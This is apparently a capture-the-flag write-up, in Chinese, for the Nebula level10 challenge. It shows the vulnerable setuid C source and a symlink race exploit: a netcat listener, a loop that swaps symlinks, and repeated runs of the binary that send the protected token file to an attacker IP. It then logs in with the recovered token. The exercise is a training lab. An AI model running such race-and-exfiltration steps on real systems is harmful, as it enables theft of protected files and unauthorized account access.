題目源碼:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
int main(int argc, char **argv)
{
char *file;
char *host;
if(argc < 3) {
printf("%s file host\n\tsends file to host if you have access to it\n", argv[0]);
exit(1);
}
file = argv[1];
host = argv[2];
if(access(argv[1], R_OK) == 0) {
int fd;
int ffd;
int rc;
struct sockaddr_in sin;
char buffer[4096];
printf("Connecting to %s:18211 .. ", host); fflush(stdout);
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(host);
sin.sin_port = htons(18211);
if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) {
printf("Unable to connect to host %s\n", host);
exit(EXIT_FAILURE);
}
#define HITHERE ".oO Oo.\n"
if(write(fd, HITHERE, strlen(HITHERE)) == -1) {
printf("Unable to write banner to host %s\n", host);
exit(EXIT_FAILURE);
}
#undef HITHERE
printf("Connected!\nSending file .. "); fflush(stdout);
ffd = open(file, O_RDONLY);
if(ffd == -1) {
printf("Damn. Unable to open file\n");
exit(EXIT_FAILURE);
}
rc = read(ffd, buffer, sizeof(buffer));
if(rc == -1) {
printf("Unable to read from file: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
write(fd, buffer, rc);
printf("wrote file!\n");
} else {
printf("You don't have access to %s\n", file);
}
}
在/home/flag10目錄下存在token文件,但是其他用戶無權限訪問:
level10@nebula:/home/flag10$ ls -l
total 9
-rwsr-x--- 1 flag10 level10 7743 2011-11-20 21:22 flag10
-rw------- 1 flag10 flag10 37 2011-11-20 21:22 token
程序使用access訪問文件,若訪問成功,則執行後面的操作。
利用思路是在程序執行過程中替換文件,獲取token文件內容。
1. 在kali下監聽端口:
while true; do nc -l -p 18211; done
2. 創建符號鏈接,將/tmp/token在/tmp/token1和/home/flag10/token直接切換:
while true; do ln -fs /tmp/token1 /tmp/token; ln -fs /home/flag10/token /tmp/token; done
3. /home/flag10/flag10調用/tmp/token文件:
while true; do /home/flag10/flag10 /tmp/token 192.168.216.130; done
4. 在kali下獲取到token內容:
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
5. 使用token文件內容作爲密碼,登陸flag10賬戶。